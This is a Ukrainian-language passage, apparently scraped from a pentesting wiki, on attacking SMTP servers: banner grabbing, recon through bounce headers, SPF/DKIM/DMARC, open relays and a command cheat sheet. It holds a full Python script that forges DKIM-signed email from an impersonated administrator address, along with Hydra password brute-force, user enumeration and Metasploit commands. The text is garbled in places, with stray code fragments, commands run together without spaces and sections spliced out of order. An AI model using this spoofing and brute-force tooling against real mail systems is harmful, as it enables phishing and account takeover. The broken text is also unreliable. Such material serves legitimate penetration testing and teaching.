Отримайте перспективу хакера щодо ваших веб-додатків, мережі та хмари
Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування атакуючої поверхні, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.
Основна інформація
Протокол простого пересилання пошти (SMTP) — це протокол, що використовується в рамках TCP/IP для відправки та отримання електронної пошти. Через свої обмеження в чергуванні повідомлень на стороні отримувача, SMTP часто використовується разом з POP3 або IMAP. Ці додаткові протоколи дозволяють користувачам зберігати повідомлення на серверному поштовому ящику та періодично їх завантажувати.
На практиці, звичайно, електронні поштові програми використовують SMTP для відправки електронних листів, в той час як для їх отримання використовують POP3 або IMAP. На системах, що базуються на Unix, sendmail виділяється як SMTP-сервер, що найчастіше використовується для електронної пошти. Комерційний пакет, відомий як Sendmail, включає сервер POP3. Крім того, Microsoft Exchange надає SMTP-сервер і пропонує можливість включення підтримки POP3.
Порт за замовчуванням: 25,465(ssl),587(ssl)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
EMAIL Headers
Якщо у вас є можливість змусити жертву надіслати вам електронний лист (наприклад, через контактну форму веб-сторінки), зробіть це, тому що ви можете дізнатися про внутрішню топологію жертви, переглянувши заголовки листа.
Ви також можете отримати електронний лист від SMTP-сервера, намагаючись надіслати на цей сервер електронний лист на неіснуючу адресу (оскільки сервер надішле атакуючому лист NDN). Але переконайтеся, що ви надсилаєте електронний лист з дозволеної адреси (перевірте політику SPF) і що ви можете отримувати повідомлення NDN.
Вам також слід спробувати надіслати різний вміст, оскільки ви можете знайти більше цікавої інформації в заголовках, таких як: X-Virus-Scanned: by av.domain.com
Вам слід надіслати тестовий файл EICAR.
Виявлення AV може дозволити вам експлуатувати відомі вразливості.
Basic actions
Banner Grabbing/Basic connection
SMTP:
nc-vn<IP>25
SMTPS:
openssls_client-crlf-connectsmtp.mailgun.org:465#SSL/TLS without starttls commandopenssls_client-starttlssmtp-crlf-connectsmtp.mailgun.org:587
Отримайте перспективу хакера щодо ваших веб-додатків, мережі та хмари
Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування атакуючої поверхні, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.
Звіти DSN
Звіти про статус доставки: Якщо ви надішлете електронний лист організації на недійсну адресу, організація повідомить, що адреса була недійсною, надіславши лист назад до вас. Заголовки повернутого електронного листа міститимуть можливу чутливу інформацію (таку як IP-адреса поштових служб, які взаємодіяли зі звітами, або інформація про антивірусне програмне забезпечення).
print("[***]successfully sent email to %s:" % (msg['To']))
</details>
## SMTP Smuggling
Уразливість SMTP Smuggling дозволила обійти всі захисти SMTP (перевірте наступний розділ для отримання додаткової інформації про захисти). Для отримання додаткової інформації про SMTP Smuggling дивіться:
<div data-gb-custom-block data-tag="content-ref" data-url='smtp-smuggling.md'>
[smtp-smuggling.md](smtp-smuggling.md)
</div>
## Заходи проти підробки електронної пошти
Організації запобігають несанкціонованій відправці електронних листів від їх імені, використовуючи **SPF**, **DKIM** та **DMARC** через простоту підробки SMTP повідомлень.
**Повний посібник з цих заходів** доступний за адресою [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).
### SPF
<div data-gb-custom-block data-tag="hint" data-style='danger'>
SPF [був "застарілим" у 2014 році](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Це означає, що замість створення **TXT запису** в `_spf.domain.com` ви створюєте його в `domain.com`, використовуючи **ту ж синтаксис**.\
Більше того, для повторного використання попередніх SPF записів досить поширено знайти щось на зразок `"v=spf1 include:_spf.google.com ~all"`
</div>
**Sender Policy Framework** (SPF) — це механізм, який дозволяє Mail Transfer Agents (MTAs) перевіряти, чи авторизований хост, що надсилає електронний лист, запитуючи список авторизованих поштових серверів, визначених організаціями. Цей список, який вказує IP-адреси/діапазони, домени та інші сутності **авторизовані для відправки електронної пошти від імені доменного імені**, включає різні "**Механізми**" у SPF записі.
#### Механізми
З [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):
| Механізм | Опис |
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | Завжди збігається; використовується для стандартного результату, як `-all` для всіх IP, які не збігаються з попередніми механізмами. |
| A | Якщо доменне ім'я має адресний запис (A або AAAA), який може бути розв'язаний на адресу відправника, воно збігається. |
| IP4 | Якщо відправник знаходиться в заданому діапазоні IPv4 адрес, збігається. |
| IP6 | Якщо відправник знаходиться в заданому діапазоні IPv6 адрес, збігається. |
| MX | Якщо доменне ім'я має MX запис, що розв'язується на адресу відправника, воно збігається (тобто пошта надходить з одного з вхідних поштових серверів домену). |
| PTR | Якщо доменне ім'я (PTR запис) для адреси клієнта знаходиться в заданому домені і це доменне ім'я розв'язується на адресу клієнта (попередньо підтверджений зворотний DNS), збігається. Цей механізм не рекомендується і слід уникати, якщо це можливо. |
| EXISTS | Якщо задане доменне ім'я розв'язується на будь-яку адресу, збігається (незалежно від адреси, на яку воно розв'язується). Це рідко використовується. Разом з макромовою SPF пропонує більш складні збіги, такі як DNSBL-запити. |
| INCLUDE | Посилається на політику іншого домену. Якщо політика цього домену проходить, цей механізм проходить. Однак, якщо включена політика не проходить, обробка продовжується. Щоб повністю делегувати політику іншого домену, необхідно використовувати розширення перенаправлення. |
| REDIRECT | <p>Перенаправлення — це вказівник на інше доменне ім'я, яке містить політику SPF, воно дозволяє кільком доменам ділитися однією і тією ж політикою SPF. Це корисно при роботі з великою кількістю доменів, які ділять одну й ту ж електронну поштову інфраструктуру.</p><p>Політика SPF домену, вказаного в механізмі перенаправлення, буде використана.</p> |
Також можливо визначити **Кваліфікатори**, які вказують **що слід робити, якщо механізм збігається**. За замовчуванням використовується **кваліфікатор "+"** (тому, якщо будь-який механізм збігається, це означає, що це дозволено).\
Зазвичай ви помітите **в кінці кожної політики SPF** щось на зразок: **\~all** або **-all**. Це використовується для вказівки, що **якщо відправник не збігається з жодною політикою SPF, ви повинні позначити електронний лист як ненадійний (\~) або відхилити (-) електронний лист.**
#### Кваліфікатори
Кожен механізм у політиці може бути попереджений одним з чотирьох кваліфікаторів для визначення бажаного результату:
* **`+`**: Відповідає результату PASS. За замовчуванням механізми припускають цей кваліфікатор, що робить `+mx` еквівалентним `mx`.
* **`?`**: Представляє результат NEUTRAL, обробляється подібно до NONE (без конкретної політики).
* **`~`**: Означає SOFTFAIL, служить середнім варіантом між NEUTRAL і FAIL. Електронні листи, які відповідають цьому результату, зазвичай приймаються, але позначаються відповідно.
* **`-`**: Вказує на FAIL, що означає, що електронний лист слід відхилити.
У наступному прикладі ілюструється **SPF політика google.com**. Зверніть увагу на включення SPF політик з різних доменів у першій політиці SPF:
```shell-session
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com. IN TXT
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
dig txt _netblocks.google.com | grep spf
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
Традиційно було можливо підробити будь-яке ім'я домену, яке не мало правильного/жодного SPF запису. Сьогодні, якщо електронна пошта надходить з домену без дійсного SPF запису, її, ймовірно, автоматично відхилять/позначать як ненадійну.
DKIM використовується для підписування вихідних електронних листів, що дозволяє їх валідацію зовнішніми агентами передачі пошти (MTA) через отримання публічного ключа домену з DNS. Цей публічний ключ знаходиться в TXT записі домену. Щоб отримати цей ключ, потрібно знати як селектор, так і ім'я домену.
Наприклад, для запиту ключа необхідні ім'я домену та селектор. Їх можна знайти в заголовку пошти DKIM-Signature, наприклад, d=gmail.com;s=20120113.
Команда для отримання цієї інформації може виглядати так:
dig20120113._domainkey.gmail.comTXT|grepp=# This command would return something like:20120113._domainkey.gmail.com.280INTXT"k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
DMARC покращує безпеку електронної пошти, спираючись на протоколи SPF та DKIM. Він визначає політики, які керують поштовими серверами у обробці електронних листів з конкретного домену, включаючи способи вирішення проблем з автентифікацією та куди надсилати звіти про дії з обробки електронної пошти.
Щоб отримати запис DMARC, вам потрібно запитати піддомен _dmarc
Зтут.
Вам потрібно мати окремі SPF записи для кожного піддомену, з якого ви хочете надсилати пошту.
Наступне спочатку було опубліковано на openspf.org, який раніше був чудовим ресурсом для цього.
Питання Демона: Що з піддоменами?
Якщо я отримую пошту з pielovers.demon.co.uk, і для pielovers немає SPF даних, чи повинен я повернутися на один рівень і перевірити SPF для demon.co.uk? Ні. Кожен піддомен у Demon є різним клієнтом, і кожен клієнт може мати свою власну політику. Не мало б сенсу, щоб політика Demon's застосовувалася до всіх його клієнтів за замовчуванням; якщо Demon хоче це зробити, він може налаштувати SPF записи для кожного піддомену.
Тому порада для видавців SPF така: ви повинні додати SPF запис для кожного піддомену або імені хоста, яке має A або MX запис.
Сайти з дикими A або MX записами також повинні мати дикий SPF запис у формі: * IN TXT "v=spf1 -all"
Це має сенс - піддомен може бути в іншому географічному місці і мати дуже інше визначення SPF.
Відкритий релей
Коли надсилаються електронні листи, важливо забезпечити, щоб вони не були позначені як спам. Це часто досягається за допомогою релейного сервера, якому довіряє отримувач. Однак поширеною проблемою є те, що адміністратори можуть не повністю усвідомлювати, які IP-діапазони безпечні для дозволу. Ця відсутність розуміння може призвести до помилок у налаштуванні SMTP сервера, що є ризиком, який часто виявляється під час оцінки безпеки.
Обхідний шлях, який деякі адміністратори використовують, щоб уникнути проблем з доставкою електронної пошти, особливо щодо спілкування з потенційними або поточними клієнтами, полягає в тому, щоб дозволити з'єднання з будь-якої IP-адреси. Це робиться шляхом налаштування параметра mynetworks SMTP сервера для прийняття всіх IP-адрес, як показано нижче:
mynetworks=0.0.0.0/0
Для перевірки, чи є поштовий сервер відкритим реле (що означає, що він може пересилати електронну пошту з будь-якого зовнішнього джерела), зазвичай використовується інструмент nmap. Він включає специфічний скрипт, призначений для тестування цього. Команда для проведення детального сканування на сервері (наприклад, з IP 10.10.10.10) на порту 25 за допомогою nmap виглядає так:
# This will send a test email from test@victim.com to destination@gmail.compython3magicspoofmail.py-dvictim.com-t-edestination@gmail.com# But you can also modify more options of the emailpython3magicspoofmail.py-dvictim.com-t-edestination@gmail.com--subjectTEST--senderadministrator@victim.com
Якщо ви отримали будь-яку помилку при використанні бібліотеки dkim python під час парсингу ключа, не соромтеся використовувати цю наступну.
ПРИМІТКА: Це просто брудне рішення для швидких перевірок у випадках, коли з якоїсь причини приватний ключ openssl не може бути розібраний dkim.
# Це надішле підписане повідомленняmail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.pyimport osimport dkim #pip3 install dkimpyimport smtplibfrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.base import MIMEBase# Set paramsdestination="destination@gmail.com"sender="administrator@victim.com"subject="Test"message_html="""<html><body><h3>This is a test, not a scam</h3><br /></body></html>"""sender_domain=sender.split("@")[1]# Prepare postfixos.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")os.system("systemctl restart postfix")# Generate DKIM keysdkim_private_key_path="dkimprivatekey.pem"os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")with open(dkim_private_key_path) as fh:dkim_private_key = fh.read()# Generate emailmsg = MIMEMultipart("alternative")msg.attach(MIMEText(message_html, "html"))msg["To"] = destinationmsg["From"] = sendermsg["Subject"] = subjectheaders = [b"To", b"From", b"Subject"]msg_data = msg.as_bytes()# Sign email with dkim## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)dkim_selector="s1"sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()msg_data = msg.as_bytes()# Use local postfix relay to send emailsmtp="127.0.0.1"s = smtplib.SMTP(smtp)s.sendmail(sender, [destination], msg_data)
Значення, що використовуються, які відрізняються від заголовків листа
Наявність дійсного та надійного SSL-сертифіката
Подання сторінки на сайти фільтрації веб-контенту
Екстракція через SMTP
Якщо ви можете надсилати дані через SMTPпрочитайте це.
Конфігураційний файл
Postfix
Зазвичай, якщо встановлено, в /etc/postfix/master.cf містить скрипти для виконання коли, наприклад, нова пошта отримується користувачем. Наприклад, рядок flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} означає, що /etc/postfix/filtering буде виконано, якщо нова пошта отримана користувачем mark.
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
https://book.hacktricks.xyz/pentesting/pentesting-smtp
Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25
Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V
Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
Отримайте перспективу хакера щодо ваших веб-додатків, мережі та хмари
Знайдіть і повідомте про критичні, експлуатовані вразливості з реальним бізнес-імпактом. Використовуйте наші 20+ спеціальних інструментів для картографування поверхні атаки, знаходження проблем безпеки, які дозволяють вам підвищити привілеї, і використовуйте автоматизовані експлойти для збору важливих доказів, перетворюючи вашу важку працю на переконливі звіти.